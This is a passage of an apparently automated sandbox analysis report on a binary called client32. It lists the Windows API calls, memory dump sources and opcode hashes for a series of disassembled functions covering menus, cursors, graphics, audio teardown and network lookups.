                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$DeleteSelect$ModePaletteStretch
                                                                                                                                    • String ID: ScaleToFitMode$View
                                                                                                                                    • API String ID: 87851494-1738379822
                                                                                                                                    • Opcode ID: a4b433c1888417e8b67604caf0941cc76bd26802fc6fd789bbeb79bd1c751b2b
                                                                                                                                    • Instruction ID: 201830c2c875b140aabe40817b5b83dce627b488e33d5f9193c9f17d6522663c
                                                                                                                                    • Opcode Fuzzy Hash: a4b433c1888417e8b67604caf0941cc76bd26802fc6fd789bbeb79bd1c751b2b
                                                                                                                                    • Instruction Fuzzy Hash: B4012575250B05AFE3659BB5D888BA7F3E9FB88709F10491CE5AAC2280CB74B8008B51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11003400 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadMenuA.USER32 ref: 1100340E
                                                                                                                                    • GetSubMenu.USER32 ref: 1100343A
                                                                                                                                    • GetSubMenu.USER32 ref: 1100345C
                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 1100346A
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                    • Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                                                                    • Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
                                                                                                                                    • Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                                                                    • Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadMenuA.USER32 ref: 1100331D
                                                                                                                                    • GetSubMenu.USER32 ref: 11003343
                                                                                                                                    • GetMenuItemCount.USER32 ref: 11003367
                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 11003379
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                    • API String ID: 4241058051-934300333
                                                                                                                                    • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                                                                    • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                                                                                    • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                                                                    • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11004860 Relevance: 12.2, APIs: 8, Instructions: 209windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(?), ref: 1100487C
                                                                                                                                    • DeleteObject.GDI32(?), ref: 11004A80
                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11004AD4
                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 11004AF9
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11004B0D
                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 11004B33
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11004B3E
                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 11004B45
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Delete$CompatibleCreateSelect$Bitmap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4070257480-0
                                                                                                                                    • Opcode ID: 960daac165e9f596e3fe3748ed86420231ceeeb6f0b7ddeb1d2d3f1080bc38ff
                                                                                                                                    • Instruction ID: 99e98b4e7945a41ca399b9880d0b398e40ede8504b5e7e4566c2d38bb3c2470d
                                                                                                                                    • Opcode Fuzzy Hash: 960daac165e9f596e3fe3748ed86420231ceeeb6f0b7ddeb1d2d3f1080bc38ff
                                                                                                                                    • Instruction Fuzzy Hash: 5BB139B8A01B019FD369CF29D580B96FBE5BF88304F10892EE9AE93754D770B845CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1111B710 Relevance: 12.1, APIs: 8, Instructions: 100COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadCursorA.USER32 ref: 1111B72B
                                                                                                                                    • DestroyCursor.USER32(?), ref: 1111B742
                                                                                                                                    • CreateCursor.USER32(00000000,0000000C,?,?,?,0000000C,?), ref: 1111B794
                                                                                                                                    • GetCursorPos.USER32(?), ref: 1111B7B3
                                                                                                                                    • WindowFromPoint.USER32(?,?), ref: 1111B7C4
                                                                                                                                    • MapWindowPoints.USER32 ref: 1111B7E0
                                                                                                                                    • GetClientRect.USER32 ref: 1111B7EE
                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 1111B800
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Cursor$RectWindow$ClientCreateDestroyFromLoadPointPoints
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 524723568-0
                                                                                                                                    • Opcode ID: e6f9fbd965d81133f2b89c17292f20cbfa02b5dfd73927a2f1a36ed18c4ea921
                                                                                                                                    • Instruction ID: 226524b821649ccf1f1a95883727ba8dcebcdd2348bff50d2c30a10b69783e4e
                                                                                                                                    • Opcode Fuzzy Hash: e6f9fbd965d81133f2b89c17292f20cbfa02b5dfd73927a2f1a36ed18c4ea921
                                                                                                                                    • Instruction Fuzzy Hash: DC31B475A00615AFD704DFB5CD84A7BF7B8FF48705F008529E8258B644E774E941C7A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100C7A0 Relevance: 12.1, APIs: 8, Instructions: 79sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1100BDB0: EnterCriticalSection.KERNEL32(000000FF,20F29797,?,00000000,00000000,1100CEA3,0000000F,Error. acmStreamOpen (out) ret %d,00000000), ref: 1100BDE4
                                                                                                                                      • Part of subcall function 1100BDB0: EnterCriticalSection.KERNEL32(?), ref: 1100BE23
                                                                                                                                      • Part of subcall function 1100BDB0: waveInStop.WINMM(?), ref: 1100BE34
                                                                                                                                      • Part of subcall function 1100BDB0: waveInReset.WINMM(?), ref: 1100BE3B
                                                                                                                                      • Part of subcall function 1100BDB0: LeaveCriticalSection.KERNEL32(?), ref: 1100BE42
                                                                                                                                      • Part of subcall function 1100BDB0: SetEvent.KERNEL32(?), ref: 1100BE57
                                                                                                                                      • Part of subcall function 1100BDB0: Sleep.KERNEL32(00000032), ref: 1100BE67
                                                                                                                                      • Part of subcall function 1100BDB0: EnterCriticalSection.KERNEL32(?), ref: 1100BE79
                                                                                                                                      • Part of subcall function 1100BDB0: waveInUnprepareHeader.WINMM(?,?,00000020), ref: 1100BE9D
                                                                                                                                      • Part of subcall function 1100BDB0: waveInClose.WINMM(?), ref: 1100BEDB
                                                                                                                                      • Part of subcall function 1100BDB0: LeaveCriticalSection.KERNEL32(?), ref: 1100BEEF
                                                                                                                                    • SetEvent.KERNEL32(?), ref: 1100C7C8
                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 1100C7E2
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1100C85D
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 1100C86D
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 1100C873
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 1100C879
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 1100C87F
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1100C888
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Deletewave$Enter$CloseEventLeaveSleep$FreeHandleHeaderLibraryResetStopUnprepare
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1533169059-0
                                                                                                                                    • Opcode ID: a22ebfafbd2fe0c88242975addf47c03f71e9ea64018652a159b6a33f03a0722
                                                                                                                                    • Instruction ID: 2616f0ca377e895a93c84c6c6260a92787aed28b1ca8a879078d94bfad696922
                                                                                                                                    • Opcode Fuzzy Hash: a22ebfafbd2fe0c88242975addf47c03f71e9ea64018652a159b6a33f03a0722
                                                                                                                                    • Instruction Fuzzy Hash: 1721B7BAA0070597E615EB708840ABFF3AABFC1718F15455CD46A5B304DB36F505CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111710D5 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedDecrement.KERNEL32(11174EF7), ref: 111710EF
                                                                                                                                    • InterlockedDecrement.KERNEL32(0F08F983), ref: 111710FC
                                                                                                                                    • InterlockedDecrement.KERNEL32(59246A00), ref: 11171109
                                                                                                                                    • InterlockedDecrement.KERNEL32(0000B685), ref: 11171116
                                                                                                                                    • InterlockedDecrement.KERNEL32(00083964), ref: 11171123
                                                                                                                                    • InterlockedDecrement.KERNEL32(00083964), ref: 1117113F
                                                                                                                                    • InterlockedDecrement.KERNEL32(103957C1), ref: 1117114F
                                                                                                                                    • InterlockedDecrement.KERNEL32(00008D89), ref: 11171165
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DecrementInterlocked
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3448037634-0
                                                                                                                                    • Opcode ID: 19fabc85f6c86ecab00d7d8bfa1c79197d3fb1e8d244682feab7decb91672283
                                                                                                                                    • Instruction ID: 2cc284c6c022ef6b925857bacda3844e372e35e42d4dbc84a0bd9c2945876612
                                                                                                                                    • Opcode Fuzzy Hash: 19fabc85f6c86ecab00d7d8bfa1c79197d3fb1e8d244682feab7decb91672283
                                                                                                                                    • Instruction Fuzzy Hash: 3E111B71B00219A7EB019FB9ED84B96FBAEAF44740F154426E918DB340DB74E510CBB0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11171046 Relevance: 12.1, APIs: 8, Instructions: 58COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 11171058
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 11171065
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 11171072
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 1117107F
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 1117108C
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 111710A8
                                                                                                                                    • InterlockedIncrement.KERNEL32(75F68504), ref: 111710B8
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 111710CE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IncrementInterlocked
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3508698243-0
                                                                                                                                    • Opcode ID: 1caffd1df763e493f64dffe24bf953fc972faafc705ecafbebbea9e5257d127f
                                                                                                                                    • Instruction ID: d860cc88617362abd74041a478900daec9bd528e14ede968423edf92d84bc9d1
                                                                                                                                    • Opcode Fuzzy Hash: 1caffd1df763e493f64dffe24bf953fc972faafc705ecafbebbea9e5257d127f
                                                                                                                                    • Instruction Fuzzy Hash: ED112D71B00259ABEB129FB9CD84B9AFBAEFF40744F004516E908D7240CB75E510CBE1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11172029 Relevance: 10.7, APIs: 7, Instructions: 196COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetStartupInfoW.KERNEL32(?), ref: 11172036
                                                                                                                                      • Part of subcall function 1116AC7E: Sleep.KERNEL32(00000000,1103179F,?,00000000), ref: 1116ACA6
                                                                                                                                    • GetFileType.KERNEL32(?,?,?), ref: 11172169
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileInfoSleepStartupType
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1527402494-0
                                                                                                                                    • Opcode ID: 269b18b44d5b9ae8378c1529d6b6e31a42482c5b2d166bca03379b9636ddb6df
                                                                                                                                    • Instruction ID: 6eed9435156d39e8aadd9e08363176580082af29c13948bf38b3e47491e18987
                                                                                                                                    • Opcode Fuzzy Hash: 269b18b44d5b9ae8378c1529d6b6e31a42482c5b2d166bca03379b9636ddb6df
                                                                                                                                    • Instruction Fuzzy Hash: D461F0769043528FE711CF64D988A99FBA0BF05338F264768D6B69B3E1EB30D946C740
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110D8180 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 147networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018915,20F29797,?,?,?,1117EE88,000000FF), ref: 110DEB61
                                                                                                                                      • Part of subcall function 110E1B10: FormatMessageA.KERNEL32(00001200,00000000,20F29797,00000400,?,?,00000000,00000401,20F29797,110D862B,00000000,?), ref: 110E1B80
                                                                                                                                    • shutdown.WSOCK32(?,00000002,00000000,00000000,00000000), ref: 110D81F9
                                                                                                                                    • closesocket.WSOCK32(?), ref: 110D8203
                                                                                                                                    • gethostname.WSOCK32(?,00000200,0000005C,00000000,?), ref: 110D8290
                                                                                                                                    • gethostbyname.WSOCK32(?), ref: 110D82C1
                                                                                                                                    • inet_ntoa.WSOCK32 ref: 110D82EC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
